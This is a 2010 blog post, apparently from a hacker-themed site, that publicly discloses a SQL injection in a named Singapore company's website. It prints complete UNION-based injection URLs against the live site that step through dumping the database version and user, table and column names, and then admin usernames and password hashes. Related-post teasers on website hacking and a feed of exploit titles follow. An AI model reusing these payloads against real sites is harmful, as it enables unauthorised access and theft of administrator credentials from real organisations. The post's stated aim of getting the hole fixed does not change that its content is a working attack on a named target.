Critical SQL Injection in www.kmd.com KMD Group of Companies

Home / Hacking, News, Security / Critical SQL Injection in www.kmd.com KMD Group of Companies

August 26, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

How to hack a website? â€“ Tips and tricks

Here are the most common techniques used to hack a website Hacking sites that are least protected by password â€“ By pass authentication Itâ€™s the webmasterâ€™s nightmare, hackers accessing the

Cyber attacks are real but is there any foolproof defense yet?

Tulip Systems Inc., the world renowned high bandwidth and broadcast stream hosting service US corporation was under repeated cyber attacks aimed at disrupting web services during the Georgia-Russia standoff few

Critical SQL injection (vulnerability) in Wati’s Official Website URL : http://www.wationline.com/

PlanetCreator reported another Critical SQL injection (vulnerability) on Wati’s Official Website URL : http://www.wationline.com/ SQL injection is a code injection technique that exploits a security vulnerability occurring in the database

[webapps] Flowise 3.0.4 - Remote Code Execution (RCE)
on October 31, 2025 at 12:00 am
Flowise 3.0.4 - Remote Code Execution (RCE)
[webapps] Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
on October 29, 2025 at 12:00 am
Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
[local] Mbed TLS 3.6.4 - Use-After-Free
on September 16, 2025 at 12:00 am
Mbed TLS 3.6.4 - Use-After-Free
[webapps] Concrete CMS 9.4.3 - Stored XSS
on September 16, 2025 at 12:00 am
Concrete CMS 9.4.3 - Stored XSS
[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
on September 16, 2025 at 12:00 am
XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)